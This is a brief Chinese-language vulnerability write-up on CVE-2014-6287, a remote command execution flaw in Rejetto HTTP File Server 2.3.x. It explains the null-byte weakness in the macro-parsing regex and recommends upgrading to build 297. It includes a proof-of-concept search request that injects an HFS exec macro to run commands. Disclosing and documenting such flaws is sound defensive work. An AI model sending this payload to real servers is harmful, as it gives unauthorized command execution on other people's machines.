Http File Server 2.3.x(HFS 2.3.X) - 远程命令执行漏洞

hfs.jpg

HFS是一种上传文件的软件,是专门为个人用户设计的HTTP档案系统,可以迅速的用于搭建HTTP虚拟服务器网站。

软   件: http file server (hfs)
版   本: 2.3.x
厂   商:http://rejetto.com
测   试 :windows sever 2008  windows7 windows8可执行
漏洞号: CVE-2014-6287
原   因:Parserlib.pas文件存在弱正则表达式
具   体:function findMacroMarker(s:string;ofs:integer=1):integer;
              begin result:=reMatch(s,'\{[.:]|[.:]\}|\|','m!',ofs) end;
              这个函数不会处理空字节,所以可以发送请求 http://localhost:80/search=%00{.exec|cmd.}

解决方案:升级最新版2.3i (Build 297)

下载地址:http://www.rejetto.com/hfs/?f=dl

发表评论: